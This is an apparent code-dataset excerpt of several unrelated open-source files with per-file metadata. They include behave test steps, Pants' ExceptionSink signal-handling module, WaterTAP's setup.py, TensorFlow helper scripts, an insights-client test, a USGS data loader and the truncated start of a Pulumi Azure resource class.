4a1b35df2c99bf468cb029d94723f6c857ac939e | 439 | py | Python | tests/acceptance/steps/interactions.py | GrantHynd/hamiltontimeline | e5a11c5baa80523123b6d16d5cb4e52846b847db | ["MIT"] | null | null | null | tests/acceptance/steps/interactions.py | GrantHynd/hamiltontimeline | e5a11c5baa80523123b6d16d5cb4e52846b847db | ["MIT"] | null | null | null | tests/acceptance/steps/interactions.py | GrantHynd/hamiltontimeline | e5a11c5baa80523123b6d16d5cb4e52846b847db | ["MIT"] | null | null | null |
from behave import *
from tests.acceptance.page_model.create_event_page import CreateEventPage
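# Use behave's regular-expression step matcher so the "(.*)" groups in the step
# decorators below are captured and passed to step_impl as arguments.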
use_step_matcher('re')
@when('I enter "(.*)" in the "(.*)" field')
def step_impl(context, content, field_name):
page = CreateEventPage(context.driver)
page.form_field(field_name).send_keys(content)
@when('I press the submit button')
def step_impl(context):
page = CreateEventPage(context.driver)
page.submit_button.click()
| 25.823529 | 73 | 0.744875 |
4a1b37d6a2f20660b860c4de77bf3ce5a5eaa741 | 22,047 | py | Python | src/python/pants/base/exception_sink.py | pierrechevalier83/pants | 57500373dbc1ea6edf5e023197f0e71291537f09 | ["Apache-2.0"] | null | null | null | src/python/pants/base/exception_sink.py | pierrechevalier83/pants | 57500373dbc1ea6edf5e023197f0e71291537f09 | ["Apache-2.0"] | 1 | 2019-07-29T16:58:21.000Z | 2019-07-29T16:58:21.000Z | src/python/pants/base/exception_sink.py | pierrechevalier83/pants | 57500373dbc1ea6edf5e023197f0e71291537f09 | ["Apache-2.0"] | null | null | null |
# Copyright 2018 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import datetime
import faulthandler
import logging
import os
import signal
import sys
import threading
import traceback
from contextlib import contextmanager
from typing import Callable
import setproctitle
from pants.base.exiter import Exiter
from pants.util.dirutil import safe_mkdir, safe_open
from pants.util.osutil import Pid
logger = logging.getLogger(__name__)
class SignalHandler:
"""A specification for how to handle a fixed set of nonfatal signals.
This is subclassed and registered with ExceptionSink.reset_signal_handler() whenever the signal
handling behavior is modified for different pants processes, for example in the remote client when
pantsd is enabled. The default behavior is to exit "gracefully" by leaving a detailed log of which
signal was received, then exiting with failure.
Note that the terminal will convert a ctrl-c from the user into a SIGINT.
"""
@property
def signal_handler_mapping(self):
"""A dict mapping (signal number) -> (a method handling the signal)."""
# Could use an enum here, but we never end up doing any matching on the specific signal value,
# instead just iterating over the registered signals to set handlers, so a dict is probably
# better.
return {
signal.SIGINT: self._handle_sigint_if_enabled,
signal.SIGQUIT: self.handle_sigquit,
signal.SIGTERM: self.handle_sigterm,
}
def __init__(self):
self._ignore_sigint_lock = threading.Lock()
self._threads_ignoring_sigint = 0
def _check_sigint_gate_is_correct(self):
assert self._threads_ignoring_sigint >= 0, \
"This should never happen, someone must have modified the counter outside of SignalHandler."
def _handle_sigint_if_enabled(self, signum, _frame):
with self._ignore_sigint_lock:
self._check_sigint_gate_is_correct()
threads_ignoring_sigint = self._threads_ignoring_sigint
if threads_ignoring_sigint == 0:
self.handle_sigint(signum, _frame)
@contextmanager
def _ignoring_sigint(self):
with self._ignore_sigint_lock:
self._check_sigint_gate_is_correct()
self._threads_ignoring_sigint += 1
try:
yield
finally:
with self._ignore_sigint_lock:
self._threads_ignoring_sigint -= 1
self._check_sigint_gate_is_correct()
def handle_sigint(self, signum, _frame):
raise KeyboardInterrupt('User interrupted execution with control-c!')
# TODO(#7406): figure out how to let sys.exit work in a signal handler instead of having to raise
# this exception!
class SignalHandledNonLocalExit(Exception):
"""Raised in handlers for non-fatal signals to overcome Python limitations.
When waiting on a subprocess and in a signal handler, sys.exit appears to be ignored, and causes
the signal handler to return. We want to (eventually) exit after these signals, not ignore them,
so we raise this exception instead and check it in our sys.excepthook override.
"""
def __init__(self, signum, signame):
self.signum = signum
self.signame = signame
self.traceback_lines = traceback.format_stack()
super(SignalHandler.SignalHandledNonLocalExit, self).__init__()
def handle_sigquit(self, signum, _frame):
raise self.SignalHandledNonLocalExit(signum, 'SIGQUIT')
def handle_sigterm(self, signum, _frame):
raise self.SignalHandledNonLocalExit(signum, 'SIGTERM')
class ExceptionSink:
"""A mutable singleton object representing where exceptions should be logged to."""
# NB: see the bottom of this file where we call reset_log_location() and other mutators in order
# to properly setup global state.
_log_dir = None
# We need an exiter in order to know what to do after we log a fatal exception or handle a
# catchable signal.
_exiter = None
# Where to log stacktraces to in a SIGUSR2 handler.
_interactive_output_stream = None
# Whether to print a stacktrace in any fatal error message printed to the terminal.
_should_print_backtrace_to_terminal = True
# An instance of `SignalHandler` which is invoked to handle a static set of specific
# nonfatal signals (these signal handlers are allowed to make pants exit, but unlike SIGSEGV they
# don't need to exit immediately).
_signal_handler = None
# These persistent open file descriptors are kept so the signal handler can do almost no work
# (and lets faulthandler figure out signal safety).
_pid_specific_error_fileobj = None
_shared_error_fileobj = None
def __new__(cls, *args, **kwargs):
raise TypeError('Instances of {} are not allowed to be constructed!'
.format(cls.__name__))
class ExceptionSinkError(Exception): pass
@classmethod
def reset_should_print_backtrace_to_terminal(cls, should_print_backtrace):
"""Set whether a backtrace gets printed to the terminal error stream on a fatal error.
Class state:
- Overwrites `cls._should_print_backtrace_to_terminal`.
"""
cls._should_print_backtrace_to_terminal = should_print_backtrace
# All reset_* methods are ~idempotent!
@classmethod
def reset_log_location(cls, new_log_location):
"""Re-acquire file handles to error logs based in the new location.
Class state:
- Overwrites `cls._log_dir`, `cls._pid_specific_error_fileobj`, and
`cls._shared_error_fileobj`.
OS state:
- May create a new directory.
- Overwrites signal handlers for many fatal and non-fatal signals (but not SIGUSR2).
:raises: :class:`ExceptionSink.ExceptionSinkError` if the directory does not exist or is not
writable.
"""
# We could no-op here if the log locations are the same, but there's no reason not to have the
# additional safety of re-acquiring file descriptors each time (and erroring out early if the
# location is no longer writable).
# Create the directory if possible, or raise if not writable.
cls._check_or_create_new_destination(new_log_location)
pid_specific_error_stream, shared_error_stream = cls._recapture_fatal_error_log_streams(
new_log_location)
# NB: mutate process-global state!
if faulthandler.is_enabled():
logger.debug('re-enabling faulthandler')
# Call Py_CLEAR() on the previous error stream:
# https://github.com/vstinner/faulthandler/blob/master/faulthandler.c
faulthandler.disable()
# Send a stacktrace to this file if interrupted by a fatal error.
faulthandler.enable(file=pid_specific_error_stream, all_threads=True)
# NB: mutate the class variables!
cls._log_dir = new_log_location
cls._pid_specific_error_fileobj = pid_specific_error_stream
cls._shared_error_fileobj = shared_error_stream
class AccessGlobalExiterMixin:
@property
def _exiter(self) -> Exiter:
return ExceptionSink.get_global_exiter()
@classmethod
def get_global_exiter(cls) -> Exiter:
return cls._exiter
@classmethod
@contextmanager
def exiter_as(cls, new_exiter_fun: Callable[[Exiter], Exiter]) -> None:
"""Temporarily override the global exiter.
NB: We don't want to try/finally here, because we want exceptions to propagate
with the most recent exiter installed in sys.excepthook.
If we wrap this in a try:finally, exceptions will be caught and exiters unset.
"""
previous_exiter = cls._exiter
new_exiter = new_exiter_fun(previous_exiter)
cls._reset_exiter(new_exiter)
yield
cls._reset_exiter(previous_exiter)
@classmethod
@contextmanager
def exiter_as_until_exception(cls, new_exiter_fun: Callable[[Exiter], Exiter]) -> None:
"""Temporarily override the global exiter, except this will unset it when an exception happens."""
previous_exiter = cls._exiter
new_exiter = new_exiter_fun(previous_exiter)
try:
cls._reset_exiter(new_exiter)
yield
finally:
cls._reset_exiter(previous_exiter)
@classmethod
def _reset_exiter(cls, exiter: Exiter) -> None:
"""
Class state:
- Overwrites `cls._exiter`.
Python state:
- Overwrites sys.excepthook.
"""
assert(isinstance(exiter, Exiter))
logger.debug(f"overriding the global exiter with {exiter} (from {cls._exiter})")
# NB: mutate the class variables! This is done before mutating the exception hook, because the
# uncaught exception handler uses cls._exiter to exit.
cls._exiter = exiter
# NB: mutate process-global state!
sys.excepthook = cls._log_unhandled_exception_and_exit
@classmethod
def reset_interactive_output_stream(
cls,
interactive_output_stream,
override_faulthandler_destination=True
):
"""
Class state:
- Overwrites `cls._interactive_output_stream`.
OS state:
- Overwrites the SIGUSR2 handler.
This method registers a SIGUSR2 handler, which permits a non-fatal `kill -31 <pants pid>` for
    stacktrace retrieval. This is also where the error message on fatal exit will be printed to.
"""
try:
# NB: mutate process-global state!
# This permits a non-fatal `kill -31 <pants pid>` for stacktrace retrieval.
if override_faulthandler_destination:
faulthandler.register(signal.SIGUSR2, interactive_output_stream,
all_threads=True, chain=False)
# NB: mutate the class variables!
cls._interactive_output_stream = interactive_output_stream
except ValueError:
# Warn about "ValueError: IO on closed file" when the stream is closed.
cls.log_exception(
"Cannot reset interactive_output_stream -- stream (probably stderr) is closed")
@classmethod
def exceptions_log_path(cls, for_pid=None, in_dir=None):
"""Get the path to either the shared or pid-specific fatal errors log file."""
if for_pid is None:
intermediate_filename_component = ''
else:
assert(isinstance(for_pid, Pid))
intermediate_filename_component = '.{}'.format(for_pid)
in_dir = in_dir or cls._log_dir
return os.path.join(
in_dir,
'logs',
'exceptions{}.log'.format(intermediate_filename_component))
@classmethod
def log_exception(cls, msg):
"""Try to log an error message to this process's error log and the shared error log.
NB: Doesn't raise (logs an error instead).
"""
pid = os.getpid()
fatal_error_log_entry = cls._format_exception_message(msg, pid)
# We care more about this log than the shared log, so write to it first.
try:
cls._try_write_with_flush(cls._pid_specific_error_fileobj, fatal_error_log_entry)
except Exception as e:
logger.error(
"Error logging the message '{}' to the pid-specific file handle for {} at pid {}:\n{}"
.format(msg, cls._log_dir, pid, e))
# Write to the shared log.
try:
# TODO: we should probably guard this against concurrent modification by other pants
# subprocesses somehow.
cls._try_write_with_flush(cls._shared_error_fileobj, fatal_error_log_entry)
except Exception as e:
logger.error(
"Error logging the message '{}' to the shared file handle for {} at pid {}:\n{}"
.format(msg, cls._log_dir, pid, e))
@classmethod
def _try_write_with_flush(cls, fileobj, payload):
"""This method is here so that it can be patched to simulate write errors.
This is because mock can't patch primitive objects like file objects.
"""
fileobj.write(payload)
fileobj.flush()
@classmethod
def _check_or_create_new_destination(cls, destination):
try:
safe_mkdir(destination)
except Exception as e:
raise cls.ExceptionSinkError(
"The provided exception sink path at '{}' is not writable or could not be created: {}."
.format(destination, str(e)),
e)
@classmethod
def _recapture_fatal_error_log_streams(cls, new_log_location):
# NB: We do not close old file descriptors under the assumption their lifetimes are managed
# elsewhere.
# We recapture both log streams each time.
pid = os.getpid()
pid_specific_log_path = cls.exceptions_log_path(for_pid=pid, in_dir=new_log_location)
shared_log_path = cls.exceptions_log_path(in_dir=new_log_location)
assert(pid_specific_log_path != shared_log_path)
try:
# Truncate the pid-specific error log file.
pid_specific_error_stream = safe_open(pid_specific_log_path, mode='w')
# Append to the shared error file.
shared_error_stream = safe_open(shared_log_path, mode='a')
except Exception as e:
raise cls.ExceptionSinkError(
"Error opening fatal error log streams for log location '{}': {}"
.format(new_log_location, str(e)))
return (pid_specific_error_stream, shared_error_stream)
@classmethod
def reset_signal_handler(cls, signal_handler):
"""
Class state:
- Overwrites `cls._signal_handler`.
OS state:
- Overwrites signal handlers for SIGINT, SIGQUIT, and SIGTERM.
NB: This method calls signal.signal(), which will crash if not called from the main thread!
:returns: The :class:`SignalHandler` that was previously registered, or None if this is
the first time this method was called.
"""
assert(isinstance(signal_handler, SignalHandler))
# NB: Modify process-global state!
for signum, handler in signal_handler.signal_handler_mapping.items():
signal.signal(signum, handler)
# Retry any system calls interrupted by any of the signals we just installed handlers for
# (instead of having them raise EINTR). siginterrupt(3) says this is the default behavior on
# Linux and OSX.
signal.siginterrupt(signum, False)
previous_signal_handler = cls._signal_handler
# NB: Mutate the class variables!
cls._signal_handler = signal_handler
return previous_signal_handler
@classmethod
@contextmanager
def trapped_signals(cls, new_signal_handler):
"""
A contextmanager which temporarily overrides signal handling.
NB: This method calls signal.signal(), which will crash if not called from the main thread!
"""
previous_signal_handler = cls.reset_signal_handler(new_signal_handler)
try:
yield
finally:
cls.reset_signal_handler(previous_signal_handler)
@classmethod
@contextmanager
def ignoring_sigint(cls):
"""
A contextmanager which disables handling sigint in the current signal handler.
This allows threads that are not the main thread to ignore sigint.
NB: Only use this if you can't use ExceptionSink.trapped_signals().
Class state:
- Toggles `self._ignore_sigint` in `cls._signal_handler`.
"""
with cls._signal_handler._ignoring_sigint():
yield
@classmethod
def _iso_timestamp_for_now(cls):
return datetime.datetime.now().isoformat()
# NB: This includes a trailing newline, but no leading newline.
_EXCEPTION_LOG_FORMAT = """\
timestamp: {timestamp}
process title: {process_title}
sys.argv: {args}
pid: {pid}
{message}
"""
@classmethod
def _format_exception_message(cls, msg, pid):
return cls._EXCEPTION_LOG_FORMAT.format(
timestamp=cls._iso_timestamp_for_now(),
process_title=setproctitle.getproctitle(),
args=sys.argv,
pid=pid,
message=msg)
_traceback_omitted_default_text = '(backtrace omitted)'
@classmethod
def _format_traceback(cls, traceback_lines, should_print_backtrace):
if should_print_backtrace:
traceback_string = '\n{}'.format(''.join(traceback_lines))
else:
traceback_string = ' {}'.format(cls._traceback_omitted_default_text)
return traceback_string
_UNHANDLED_EXCEPTION_LOG_FORMAT = """\
Exception caught: ({exception_type}){backtrace}
Exception message: {exception_message}{maybe_newline}
"""
@classmethod
def _format_unhandled_exception_log(cls, exc, tb, add_newline, should_print_backtrace):
exc_type = type(exc)
exception_full_name = '{}.{}'.format(exc_type.__module__, exc_type.__name__)
exception_message = str(exc) if exc else '(no message)'
maybe_newline = '\n' if add_newline else ''
return cls._UNHANDLED_EXCEPTION_LOG_FORMAT.format(
exception_type=exception_full_name,
backtrace=cls._format_traceback(traceback_lines=traceback.format_tb(tb),
should_print_backtrace=should_print_backtrace),
exception_message=exception_message,
maybe_newline=maybe_newline)
_EXIT_FAILURE_TERMINAL_MESSAGE_FORMAT = """\
{timestamp_msg}{terminal_msg}{details_msg}
"""
@classmethod
def _exit_with_failure(cls, terminal_msg):
timestamp_msg = (f'timestamp: {cls._iso_timestamp_for_now()}\n'
if cls._should_print_backtrace_to_terminal else '')
details_msg = ('' if cls._should_print_backtrace_to_terminal
else '\n\n(Use --print-exception-stacktrace to see more error details.)')
terminal_msg = terminal_msg or '<no exit reason provided>'
formatted_terminal_msg = cls._EXIT_FAILURE_TERMINAL_MESSAGE_FORMAT.format(
timestamp_msg=timestamp_msg, terminal_msg=terminal_msg, details_msg=details_msg)
# Exit with failure, printing a message to the terminal (or whatever the interactive stream is).
cls._exiter.exit_and_fail(msg=formatted_terminal_msg, out=cls._interactive_output_stream)
@classmethod
def _log_unhandled_exception_and_exit(cls, exc_class=None, exc=None, tb=None, add_newline=False):
"""A sys.excepthook implementation which logs the error and exits with failure."""
exc_class = exc_class or sys.exc_info()[0]
exc = exc or sys.exc_info()[1]
tb = tb or sys.exc_info()[2]
# This exception was raised by a signal handler with the intent to exit the program.
if exc_class == SignalHandler.SignalHandledNonLocalExit:
return cls._handle_signal_gracefully(exc.signum, exc.signame, exc.traceback_lines)
extra_err_msg = None
try:
# Always output the unhandled exception details into a log file, including the traceback.
exception_log_entry = cls._format_unhandled_exception_log(exc, tb, add_newline,
should_print_backtrace=True)
cls.log_exception(exception_log_entry)
except Exception as e:
extra_err_msg = 'Additional error logging unhandled exception {}: {}'.format(exc, e)
logger.error(extra_err_msg)
# Generate an unhandled exception report fit to be printed to the terminal (respecting the
# Exiter's should_print_backtrace field).
if cls._should_print_backtrace_to_terminal:
stderr_printed_error = cls._format_unhandled_exception_log(
exc, tb, add_newline,
should_print_backtrace=cls._should_print_backtrace_to_terminal)
if extra_err_msg:
stderr_printed_error = '{}\n{}'.format(stderr_printed_error, extra_err_msg)
else:
# If the user didn't ask for a backtrace, show a succinct error message without
# all the exception-related preamble. A power-user/pants developer can still
# get all the preamble info along with the backtrace, but the end user shouldn't
# see that boilerplate by default.
error_msgs = getattr(exc, 'end_user_messages', lambda: [str(exc)])()
stderr_printed_error = '\n' + '\n'.join(f'ERROR: {msg}' for msg in error_msgs)
cls._exit_with_failure(stderr_printed_error)
_CATCHABLE_SIGNAL_ERROR_LOG_FORMAT = """\
Signal {signum} ({signame}) was raised. Exiting with failure.{formatted_traceback}
"""
@classmethod
def _handle_signal_gracefully(cls, signum, signame, traceback_lines):
"""Signal handler for non-fatal signals which raises or logs an error and exits with failure."""
# Extract the stack, and format an entry to be written to the exception log.
formatted_traceback = cls._format_traceback(traceback_lines=traceback_lines,
should_print_backtrace=True)
signal_error_log_entry = cls._CATCHABLE_SIGNAL_ERROR_LOG_FORMAT.format(
signum=signum,
signame=signame,
formatted_traceback=formatted_traceback)
# TODO: determine the appropriate signal-safe behavior here (to avoid writing to our file
# descriptors re-entrantly, which raises an IOError).
# This method catches any exceptions raised within it.
cls.log_exception(signal_error_log_entry)
# Create a potentially-abbreviated traceback for the terminal or other interactive stream.
formatted_traceback_for_terminal = cls._format_traceback(
traceback_lines=traceback_lines,
should_print_backtrace=cls._should_print_backtrace_to_terminal)
terminal_log_entry = cls._CATCHABLE_SIGNAL_ERROR_LOG_FORMAT.format(
signum=signum,
signame=signame,
formatted_traceback=formatted_traceback_for_terminal)
# Exit, printing the output to the terminal.
cls._exit_with_failure(terminal_log_entry)
# Setup global state such as signal handlers and sys.excepthook with probably-safe values at module
# import time.
# Set the log location for writing logs before bootstrap options are parsed.
ExceptionSink.reset_log_location(os.getcwd())
# Sets except hook for exceptions at import time.
ExceptionSink._reset_exiter(Exiter(exiter=sys.exit))
# Sets a SIGUSR2 handler.
ExceptionSink.reset_interactive_output_stream(sys.stderr.buffer)
# Sets a handler that logs nonfatal signals to the exception sink before exiting.
ExceptionSink.reset_signal_handler(SignalHandler())
# Set whether to print stacktraces on exceptions or signals during import time.
# NB: This will be overridden by bootstrap options in PantsRunner, so we avoid printing out a full
# stacktrace when a user presses control-c during import time unless the environment variable is set
# to explicitly request it. The exception log will have any stacktraces regardless so this should
# not hamper debugging.
ExceptionSink.reset_should_print_backtrace_to_terminal(
should_print_backtrace=os.environ.get('PANTS_PRINT_EXCEPTION_STACKTRACE', 'True') == 'True')
| 40.305302 | 102 | 0.733796 |
4a1b3a94b52bc276ac1b6b5cf2e3c2d0cdc87115 | 6,032 | py | Python | setup.py | luohezhiming/chenyu | 227d67a56bfacb85210ad07d6f44e84a8b0d2ea1 | ["BSD-3-Clause-LBNL"] | null | null | null | setup.py | luohezhiming/chenyu | 227d67a56bfacb85210ad07d6f44e84a8b0d2ea1 | ["BSD-3-Clause-LBNL"] | null | null | null | setup.py | luohezhiming/chenyu | 227d67a56bfacb85210ad07d6f44e84a8b0d2ea1 | ["BSD-3-Clause-LBNL"] | null | null | null |
###############################################################################
# WaterTAP Copyright (c) 2021, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National
# Laboratory, National Renewable Energy Laboratory, and National Energy
# Technology Laboratory (subject to receipt of any required approvals from
# the U.S. Dept. of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#
###############################################################################
"""
Project setup with setuptools
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_namespace_packages
import pathlib
cwd = pathlib.Path(__file__).parent.resolve() # this will come in handy, probably
long_description = """WaterTAP is an open-source, integrated suite of predictive multi-scale models
for design and optimization of water treatment processes and systems. Specifically, WaterTAP is a new
library of water treatment-specific property, process unit, and network models that depend on the IDAES Platform,
an open source, next generation process systems engineering platform developed at the National Energy Technology
Laboratory with other partners. The WaterTAP project is funded by the NAWI as a part of U.S. Department of
Energy’s Energy-Water Desalination Hub. The goal of WaterTAP is to assist the hub and the broader water R&D
community in assessing existing and emerging water treatment technologies by 1) providing predictive capabilities
involving the design, optimization, and performance of water treatment systems that will lead to improved energy
efficiency and lower cost, 2) advancing the state of the art for the design of water treatment components, systems
and networks to be comparable with, or even surpass, that in the chemical industry, and 3) disseminating these tools
for active use by water treatment researchers and engineers.""".replace(
"\n", " "
).strip()
SPECIAL_DEPENDENCIES_FOR_RELEASE = [
"idaes-pse>=1.12.0", # from PyPI
]
SPECIAL_DEPENDENCIES_FOR_PRERELEASE = [
# update with a tag from the nawi-hub/idaes-pse
# when a version of IDAES newer than the latest stable release from PyPI
# will become needed for the watertap development
"idaes-pse[prerelease] @ https://github.com/watertap-org/idaes-pse/archive/1.12.1.watertap.2022.02.04.zip",
]
# Arguments marked as "Required" below must be included for upload to PyPI.
# Fields marked as "Optional" may be commented out.
setup(
name="watertap",
url="https://github.com/watertap-org/watertap",
version="0.4.0dev",
description="WaterTAP modeling library",
long_description=long_description,
long_description_content_type="text/plain",
author="NAWI team",
license="BSD",
# Classifiers help users find your project by categorizing it.
#
# For a list of valid classifiers, see https://pypi.org/classifiers/
classifiers=[
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
"Development Status :: 3 - Alpha",
"Intended Audience :: End Users/Desktop",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: BSD License",
"Natural Language :: English",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows",
"Operating System :: Unix",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Scientific/Engineering :: Mathematics",
"Topic :: Scientific/Engineering :: Chemistry",
"Topic :: Software Development :: Libraries :: Python Modules",
"Programming Language :: Python :: 3 :: Only",
],
keywords="water systems, chemical engineering, process modeling, filtration, desalination, nawi",
packages=find_namespace_packages(),
python_requires=">=3.7, <4",
install_requires=[
# primary requirements for unit and property models
# maintainers: switch to SPECIAL_DEPENDENCIES_FOR_RELEASE when cutting a release of watertap
*SPECIAL_DEPENDENCIES_FOR_PRERELEASE,
"pyomo>=6.2", # (also needed for units in electrolyte database (edb))
# the following requirements are for the electrolyte database (edb)
"pymongo>3", # database interface
"fastjsonschema", # schema validation
"click", # command-line tools with Click
# tutorial tests
"nbformat",
"scipy",
# https://www.python.org/dev/peps/pep-0508/#environment-markers
'pywin32==225 ; platform_system=="Windows" and python_version>="3.8"',
],
extras_require={
"testing": [
"pytest",
"json-schema-for-humans",
"mongomock",
],
"dev": [
"myst-parser", # markdown support for Sphinx
"nbsphinx", # jupyter notebook support for sphinx
"Sphinx", # docs
"sphinx_rtd_theme", # docs
# other requirements
"linkify-it-py",
"json-schema-for-humans", # pretty JSON schema in HTML
"black", # code formatting
# other requirements
"pytest", # test framework
"pytest-cov", # code coverage
"mongomock", # mongodb mocking for testing
],
},
package_data={ # Optional
"": [
"*.json",
"*.yaml",
"*.yml",
],
},
entry_points={
# add edb CLI commands
"console_scripts": [
"edb = watertap.edb.commands:command_base",
]
},
)
| 43.085714 | 116 | 0.650696 |
4a1b3ab2797d6fc32be7292d94b56d5917aa3dd7 | 1,189 | py | Python | utils/scripts_utils.py | assansanogo/TransformerTTS | 58a3ec05a12184d55ce99e069b2307bb3279433b | ["MIT"] | 894 | 2020-05-14T21:07:27.000Z | 2022-03-30T10:19:27.000Z | utils/scripts_utils.py | assansanogo/TransformerTTS | 58a3ec05a12184d55ce99e069b2307bb3279433b | ["MIT"] | 89 | 2020-05-15T12:27:45.000Z | 2022-02-26T07:23:38.000Z | utils/scripts_utils.py | assansanogo/TransformerTTS | 58a3ec05a12184d55ce99e069b2307bb3279433b | ["MIT"] | 184 | 2020-04-24T01:27:58.000Z | 2022-03-31T07:54:22.000Z |
import traceback
import argparse
import tensorflow as tf
def dynamic_memory_allocation():
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
try:
# Currently, memory growth needs to be the same across GPUs
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
logical_gpus = tf.config.experimental.list_logical_devices('GPU')
print(len(gpus), 'Physical GPUs,', len(logical_gpus), 'Logical GPUs')
except Exception:
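            # tf.config.experimental.set_memory_growth() only takes effect before the
            # GPUs are initialized; if it is called too late, log the error and move on.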
traceback.print_exc()
def basic_train_parser():
parser = argparse.ArgumentParser()
parser.add_argument('--config', dest='config', type=str)
parser.add_argument('--reset_dir', dest='clear_dir', action='store_true',
help="deletes everything under this config's folder.")
parser.add_argument('--reset_logs', dest='clear_logs', action='store_true',
help="deletes logs under this config's folder.")
parser.add_argument('--reset_weights', dest='clear_weights', action='store_true',
help="deletes weights under this config's folder.")
return parser
| 39.633333 | 85 | 0.651808 |
4a1b3b556c5846821f6be866c0b42121374e43e0 | 1,653 | py | Python | insights/tests/client/test_displayname.py | lhuett/insights-core | 1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8 | ["Apache-2.0"] | 121 | 2017-05-30T20:23:25.000Z | 2022-03-23T12:52:15.000Z | insights/tests/client/test_displayname.py | lhuett/insights-core | 1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8 | ["Apache-2.0"] | 1,977 | 2017-05-26T14:36:03.000Z | 2022-03-31T10:38:53.000Z | insights/tests/client/test_displayname.py | lhuett/insights-core | 1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8 | ["Apache-2.0"] | 244 | 2017-05-30T20:22:57.000Z | 2022-03-26T10:09:39.000Z |
import pytest
from insights.client.config import InsightsConfig
from insights.client.connection import InsightsConnection
from mock.mock import patch
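# Minimal stand-ins for the HTTP session and response objects that InsightsConnection
# normally creates, so these tests never make real network calls.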
class MockSession(object):
def __init__(self):
self.status_code = None
self.text = None
self.content = '{"display_name": "test"}'
def get(self, url=None, timeout=None, headers=None, data=None):
return MockResponse(self.status_code, self.text, self.content)
def put(self, url=None, timeout=None, headers=None, data=None):
return MockResponse(self.status_code, self.text, None)
class MockResponse(object):
def __init__(self, expected_status, expected_text, expected_content):
self.status_code = expected_status
self.text = expected_text
self.content = expected_content
def mock_init_session(obj):
return MockSession()
def mock_get_proxies(obj):
return
@pytest.mark.skip(reason='No time to fix this for double-API calling')
@patch('insights.client.connection.InsightsConnection._init_session',
mock_init_session)
@patch('insights.client.connection.InsightsConnection.get_proxies',
mock_get_proxies)
@patch('insights.client.utilities.constants.machine_id_file',
'/tmp/machine-id')
def test_set_display_name():
conf = InsightsConfig()
c = InsightsConnection(conf)
c.session.status_code = 200
assert c.set_display_name('GO STICK YOUR HEAD IN A PIG')
c.session.status_code = 404
assert not c.set_display_name('GO STICK YOUR HEAD IN A PIG')
c.session.status_code = 500
c.session.text = 'oops'
assert not c.set_display_name('GO STICK YOUR HEAD IN A PIG')
| 31.788462 | 73 | 0.725348 |
4a1b3c8fddfd4b54a3438cb7b47bd7c0f5a0007d | 384 | py | Python | sources/of97_489/__init__.py | kueda/underfoot | b9d1a05fced70c494e582280c577bf5e16b73f77 | ["MIT"] | 4 | 2018-10-12T18:48:55.000Z | 2022-03-10T05:30:18.000Z | sources/of97_489/__init__.py | kueda/underfoot | b9d1a05fced70c494e582280c577bf5e16b73f77 | ["MIT"] | 4 | 2020-07-16T09:44:48.000Z | 2020-11-21T08:09:53.000Z | sources/of97_489/__init__.py | kueda/underfoot | b9d1a05fced70c494e582280c577bf5e16b73f77 | ["MIT"] | null | null | null |
import util
import os
def run():
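    # Process the USGS OF97-489 (Santa Cruz County geology) ARC/INFO export,
    # using NAD27 / UTM zone 10 as the source projection and attaching unit
    # metadata from units.csv.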
util.process_usgs_source(
base_path=os.path.realpath(__file__),
url="http://pubs.usgs.gov/of/1997/of97-489/sc-geol.e00.gz",
e00_path="sc-geol.e00",
srs=util.NAD27_UTM10_PROJ4,
metadata_csv_path=os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"units.csv"
)
)
| 24 | 67 | 0.601563 |
4a1b3d3f15e8ae4b46da9f6af68c3e431ec35c9f | 24,915 | py | Python | sdk/python/pulumi_azure_native/network/v20210201/private_link_service.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | ["Apache-2.0"] | null | null | null | sdk/python/pulumi_azure_native/network/v20210201/private_link_service.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | ["Apache-2.0"] | null | null | null | sdk/python/pulumi_azure_native/network/v20210201/private_link_service.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | ["Apache-2.0"] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['PrivateLinkServiceInitArgs', 'PrivateLinkService']
@pulumi.input_type
class PrivateLinkServiceInitArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
auto_approval: Optional[pulumi.Input['PrivateLinkServicePropertiesAutoApprovalArgs']] = None,
enable_proxy_protocol: Optional[pulumi.Input[bool]] = None,
extended_location: Optional[pulumi.Input['ExtendedLocationArgs']] = None,
fqdns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
id: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input['PrivateLinkServiceIpConfigurationArgs']]]] = None,
load_balancer_frontend_ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input['FrontendIPConfigurationArgs']]]] = None,
location: Optional[pulumi.Input[str]] = None,
service_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
visibility: Optional[pulumi.Input['PrivateLinkServicePropertiesVisibilityArgs']] = None):
"""
The set of arguments for constructing a PrivateLinkService resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
